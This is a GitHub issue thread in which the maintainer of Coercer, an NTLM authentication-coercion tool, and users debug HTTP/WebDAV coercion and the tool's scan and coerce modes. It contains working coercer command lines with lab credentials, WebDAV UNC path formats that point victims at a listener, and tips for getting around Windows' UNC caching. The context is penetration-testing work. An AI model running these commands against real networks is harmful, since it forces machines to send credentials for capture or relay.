### ISSUE TITLE
[bug] HTTP Authentications works in ntlmrelay from Coercer in coerce mode, but not detected by Coercer in scan and fuzz modes

### ISSUE THREAD

**Issue by p0dalirius** [p0dalirius/Coercer#42]
HTTP Authentications works in ntlmrelay

https://user-images.githubusercontent.com/79218792/206928507-697e659b-4096-4466-be2f-15432d742206.mp4

but not detected by Coercer in scan and fuzz modes

Follow up on #40 by @jsdhasfedssad

**Comment by jsdhasfedssad** [comment]
Hi,

I have been testing coercing SMB and HTTP using version 2.2 using version 1.6 as refference to make sure my setup was working. The result for me is that coercing SMB as anonymous and as authenticated works against Responder and ntlmrelayx in both versions. However, coercing HTTP as anonymous and as authenticated does not work in version 2.2 regardless if Responder or ntlmrelayx is used. There is simply no traffic that reaches Responder from the target when coercing. And as before, if I copy the "filename" output from Coercer 2.2 to Windows Explorer on the targeted DC coercing HTTP works against both Responder and ntlmrelayx.

**Comment by PedantHTB** [comment]
@p0dalirius I can confirm the comment by @jsdhasfedssad . It also does not work on 2.4.

**Comment by jsdhasfedssad** [comment]
Hi.

Any update on this? I love this tool but as long as this issue is not fixed I am stuck using version 1.6 which for example is missing support for coercing via DCERPC. Coercing HTTP to SMB authentication is central. Attacks on  LDAP cannot be performed by coercing SMB to SMB authentication.

Thanks!

**Comment by PedantHTB** [comment]
@jsdhasfedssad I don't think the tool is being actively maintained. However, check out the "Authentication Coercion" section from [NTLM Relay Attacks](https://academy.hackthebox.com/course/preview/ntlm-relay-attacks) in case you are interested in knowing other methods of authentication coercing.

**Comment by p0dalirius** [comment]
It is, i just dont understand the root cause of this for HTTP authentications

**Comment by PedantHTB** [comment]
Hello @p0dalirius 

My apologies for that, I totally forgot about not posting paid promotions. 

Your tool is absolutely amazing. Here is how we talked about it.
![image](https://github.com/p0dalirius/Coercer/assets/100922318/ce40dc7f-73c6-428a-bd57-1b66c9503d3a)

Regarding the HTTP NTLM auth problem, we currently say this:

![image](https://github.com/p0dalirius/Coercer/assets/100922318/e8a81476-403f-42f8-b1a2-3d7895204771)

In case this gets fixed, I will happily edit the section.
Again, apologies for the paid promotion, I did not intend it.

**Comment by p0dalirius** [comment]
Thank you @PedantHTB, I was not able to see the course content. 

I am trying to fix it, it bothers me that it does not work. I'll ping you here once this is fixed!

Best regards,

**Comment by PedantHTB** [comment]
@p0dalirius Could you also please check why these debug messages are being printed in a red font color instead of green? As you see from Responder, hashes are being received. This is only in scan mode; the messages get printed in green in coerce mode.

![CoercerScan](https://github.com/p0dalirius/Coercer/assets/100922318/5b336cf4-8636-4276-93d2-a55acbddc208)

Once again, thank you for your great tool and hard work. I hope you can figure out the problem. 

Best regards 😃

**Comment by p0dalirius** [comment]
@PedantHTB I do understand why it is not clear I will explain it better in the scan mode.

**Scan Mode**:
The scan mode listens on your port 445 on your machine, and waits for authentications callbacks. If you listen with Responder or NTLMRelay while using scan mode, you will receive authentications in another tool, and therefore the messages will get printed in red. Try it again in scan mode with only Coercer running, and you will understand better the behavior :)

**Coerce mode**:
In this mode it will try to coerce authentications to a remote target, and will not listen to check if it works. I have highlighted in green the RPC responses corresponding to cases when it _should_ work.

**Comment by p0dalirius** [comment]
Trying to fix right now, 

## Poc Environment

Windows machine:
![image](https://github.com/p0dalirius/Coercer/assets/79218792/d9833a46-c471-43cd-ab2f-c990bb92d670)
=> It works if entering a Webdav path in a explorer.exe search bar

Responder:
![image](https://github.com/p0dalirius/Coercer/assets/79218792/d0b77582-9b16-4cf0-bd1b-6bceaf2e0d33)
=> We get what we want

Coercer:
![image](https://github.com/p0dalirius/Coercer/assets/79218792/ba8a2c9a-e03a-4359-a816-cb4513c3d7b9)
=> No auth is triggered in HTTP by coercer

PetitPotam:
![image](https://github.com/p0dalirius/Coercer/assets/79218792/31809022-3858-4650-a75b-3a47be55cfa8)
=> No auth is triggered in HTTP by PetitPotam

## Time to wireshark

**Comment by p0dalirius** [comment]
## Time to wireshark

Adding /e to webdav host in PetitPotam made it work
![image](https://github.com/p0dalirius/Coercer/assets/79218792/3687cb51-1d97-494c-b79e-4741eca4572c)

We get expected WebDaV handshakes
![image](https://github.com/p0dalirius/Coercer/assets/79218792/4ea1c4bf-389a-47ea-b945-64c8525407ba)

The working path format `\\WIN-D42ELKBXQBJ@80/e\test\Settings.ini`, is not the format I used in

https://github.com/p0dalirius/Coercer/blob/50173559a9a4cfe4b35a9d0de85cb46caa28c9c0/coercer/methods/MS_EFSR/EfsRpcDecryptFileSrv.py#L44

**Comment by p0dalirius** [comment]
## Coercing to WebDaV using a path with a netbios name:

In coercer:

```
coercer coerce -t 192.168.1.11 --auth-type http -u Administrator -p 'Admin123!' -l WIN-206F5YRJM2G --always-continue --filter-pipe-name lsarpc
```
![image](https://github.com/p0dalirius/Coercer/assets/79218792/add24479-f0ee-40cb-835f-b9af2edcb6f1)
=> We see HTTP requests outgoing the target machine in wireshark

And we get hashes in Responder
![image](https://github.com/p0dalirius/Coercer/assets/79218792/3002196e-79a1-4926-81a4-e5162826aa80)

**Comment by p0dalirius** [comment]
## Coercing to WebDaV using a path to an IP address:

```
\\192.168.1.27@80/weE\share\file.txt
```

I used this command line for Coercer
```
coercer coerce -t 192.168.1.11 --auth-type http -u Administrator -p 'Admin123!' -l 192.168.1.27 --always-continue --filter-pipe-name lsarpc
```

And PetitPotam and Coercer are consistent, each get a 401 Unauthorized on the WebDaV:
![image](https://github.com/p0dalirius/Coercer/assets/79218792/817dcbe1-08a7-4946-88d2-6af388799220)

![image](https://github.com/p0dalirius/Coercer/assets/79218792/2b9186b1-6fae-4364-98e8-1dcc94de7446)

**Comment by p0dalirius** [comment]
Hey @jsdhasfedssad @PedantHTB,

I have fixed this issue in https://github.com/p0dalirius/Coercer/commit/83a1fd7529ab07720b2d917e59847d8cd236c6aa and released version [2.4.3](https://github.com/p0dalirius/Coercer/releases/tag/2.4.3).

Let me know if you encounter further problems,

Best regards,
Remi GASCOU (Podalirius)

**Comment by jsdhasfedssad** [comment]
Great work! As far as I have tested so far both SMB and HTTP can be coerced now. Thank you!

**Comment by PedantHTB** [comment]
Thank you very much @p0dalirius for the extremely awesome work. I will test this and update what we have in our section in the module.

Best regards 😄

**Comment by p0dalirius** [comment]
Thank you @PedantHTB, again sorry for the trouble!

**Comment by PedantHTB** [comment]
@p0dalirius Please do not be sorry for anything, Sir; your hard work is much appreciated.

By the way, in a previous comment, you stated the following:

"The scan mode listens on your port 445 on your machine, and waits for authentications callbacks. If you listen with Responder or NTLMRelay while using scan mode, you will receive authentications in another tool, and therefore the messages will get printed in red. Try it again in scan mode with only Coercer running, and you will understand better the behavior :)"

So I went and tried what you said, but the outcome is the same: the debug messages are still being printed in red:

![ScanModeDebugMessages](https://github.com/p0dalirius/Coercer/assets/100922318/65d38c3b-d3c3-4fd2-871e-8271942fa27f)

Am I missing something, or is this unintended? If I do the same with `ntlmrelayx` running, I do get hashes coerced due to Coercer (I know so because I only respond to `172.16.117.50`, which is `WS01$`):

![ScanModeWithntlmrelayx](https://github.com/p0dalirius/Coercer/assets/100922318/c63d62cb-d37d-4bd9-9de2-841af09ac810)

**Comment by p0dalirius** [comment]
Hi @PedantHTB,

I hope you are well!

I understand your problem we were not talking about the same thing. There was a problem on older versions of Coercer where I forgot to check if Coercer is able to listen on the port in scan mode. I added a check in commit https://github.com/p0dalirius/Coercer/commit/91fbd4daf4c457e64e262f9770792e0fea3b6320 to explicitly print if a port is not available, like what Responder does.

From your screenshots I think that you ran Coercer with a normal user (if you are not `root` you cannot listen on privileged ports `< 1024`). Therefore in your case in scan mode, Coercer is trying to listen on privileged ports `< 1024` but cannot, and the fix was not yet implemented. This is what causes trouble on your tests I believe. 

Would you be so kind as to retry on the latest version of Coercer? (As of right now it is version **2.4.3**). You can upgrade it with:

```
python3 -m pip install coercer --upgrade
```

To sum up:
 - `scan` mode => Needs to be run with a **locally privileged user** to be able to listen on privileged ports `< 1024`.
 - `coerce` mode => Can run as any user, no privileges prerequisites.

I will update the documentation on the whole project soon, to precise those unclear points.

Best regards,

**Comment by PedantHTB** [comment]
Oh. I finally get it. My bad, my bad. I will do as you instructed and keep you updated.

By the way, once you update the documentation, I am ready to proofread all of it, if that suits you. Just let me know 😃

**Comment by p0dalirius** [comment]
Oh that would be awesome, I will keep you updated once the new documentation is up

I will work on the documentation in one or two weeks

**Comment by PedantHTB** [comment]
@p0dalirius Hello again 👋 

So, I downloaded the latest release and started rechecking whatever I had reported previously. Regarding the font color of debug messages, the issue persists, although _partially_. Before showing you an example, I want to state what I understand from Coercer and its `scan` mode:
- Debug messages printed in green indicate that Coercer could detect a coerced authentication for the respective RPC method.
- Debug messages printed in a red font indicate that Coercer was _not_ able to detect a coerced authentication for the respective RPC method.

When using the `scan` mode, the same RPC methods that cause Coercer to print debug messages in red make it print in green for the `scan` mode (with sudo). Consider the first six methods of `\PIPE\lsarpc`; `scan` prints the debug messages in _red_:

![coercer_scan_mode](https://github.com/p0dalirius/Coercer/assets/100922318/05312619-3123-4ca2-bc4a-4a1d5a9386a4)

However, `coerce` mode prints the same debug messages in _green_ (side note, I don't have `Responder` running):

![coercer_coerce_mode](https://github.com/p0dalirius/Coercer/assets/100922318/ac9dcf25-9631-4243-b620-aad1fbb4ba5d)

Although I only showed a very few methods, I think the overall behavior is the same. Curious to know your take on this, and pardon me if I am missing something this time also.

**Comment by p0dalirius** [comment]
Hello,

I hope you are well!

---

## Scan mode

In `scan` mode everything is printed in red if no authentication was received. Messages are only printed in green when an authentication is received on the listen port 445 (or specified HTTP port) by Coercer in this mode.

Two things are happening here in your test with `scan` mode:

![image](https://github.com/p0dalirius/Coercer/assets/79218792/c208223e-e6d5-4bc2-b440-81b791923efa)

 - You received an authentication (printed in green `SMB Auth`) with `RPRN::RpcRemoteFindFirstPrinterChangeNotification`, so coercing your remote machine works and you are able to listen and receive authentications on your local 445 port.
 
 - After that you did not get authentications anymore, this is because of an undocumented behavior that I planned to present later. To sum it up, when the Windows machine tries to access a UNC path but cannot authenticate to it (because the function is forbidden to use UNC paths, because the machine cannot access the network or resolve the name, ...) it stores this path in a cache to not retry to authenticate to the **host** of this UNC path for 30 seconds. Here is an extract from my (not-yet-public) research:

https://github.com/p0dalirius/Coercer/assets/79218792/6ed89c81-3a15-4444-b300-17d4bd387fba

 - This is why I added an option in Coercer, `--delay` to wait a certain number of seconds between two calls in order to avoid this caching behavior. If you try again with this option `--delay 40`, I think you will find the results more accurate.

```
./Coercer.py coerce -u Administrator -p 'Admin123!' -t 10.0.0.101 -l 10.0.0.5 --always-continue --delay 40
```

---

## Coerce mode

In `coerce` mode, Messages are printed in green if authentications are **probably** working. This is because we have no way to find out from the RPC return code if the authentication did work. Therefore I choose to print these messages `ERR_BAD_NETPATH` in green since they are the one we get in return if the coerced authentication took place. To sum it up:

 - When we successfully coerced an authentication, the RPC function returns `ERR_BAD_NETPATH`
 - But having a `ERR_BAD_NETPATH` does not mean that the coerced authentication did work, unfortunately. We cannot rely on this return code.

I hope it is clearer, but do not hesitate to ping me if there is still some unclear points.

Best regards,
